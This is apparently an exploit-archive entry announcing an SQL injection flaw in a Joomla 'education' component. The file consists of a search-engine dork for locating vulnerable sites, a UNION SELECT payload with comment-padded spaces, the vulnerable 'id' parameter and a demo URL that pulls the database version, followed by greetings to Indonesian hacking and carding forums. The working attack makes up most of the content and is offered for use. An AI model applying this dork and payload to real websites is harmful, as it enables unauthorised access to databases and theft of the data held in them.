42 lines
No EOL
1.5 KiB
Text
42 lines
No EOL
1.5 KiB
Text
# Exploit Title: joomla component education SQL injection Vulnerability
|
|
# Author: bumble_be
|
|
# Software Link: N/A
|
|
# Tested on: Windows XP 2
|
|
|
|
======================================================================
|
|
[x] author : bumble_be (iogi89@ymail.com)
|
|
[x] dork : inurl:option=com_education_classes
|
|
[x] myweb : http://linggau-haxor.com
|
|
======================================================================
|
|
|
|
==== SQLI EXPLOIT ====
|
|
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
|
|
|
|
|
|
|
|
==== VULN IN HERE ====
|
|
|
|
http://localhost/xampp/joomla/index.php?option=com_education_classess&task=showEvents&id=11[c0de]
|
|
|
|
|
|
|
|
==== LIVE DEMO ====
|
|
|
|
http://localhost/xampp/joomla/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
|
|
|
|
[x]-------------------------------------------------------------------
|
|
|
|
GREETZ TO WE FORUM:
|
|
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID
|
|
|
|
[x]-------------------------------------------------------------------
|
|
|
|
MY BROTHA :
|
|
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
|
|
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker
|
|
|
|
[x]-------------------------------------------------------------------
|
|
|
|
note :mulailah sesuatu dengan ucapan bissmillah
|
|
|
|
[X]------------------------------------------------------------------- |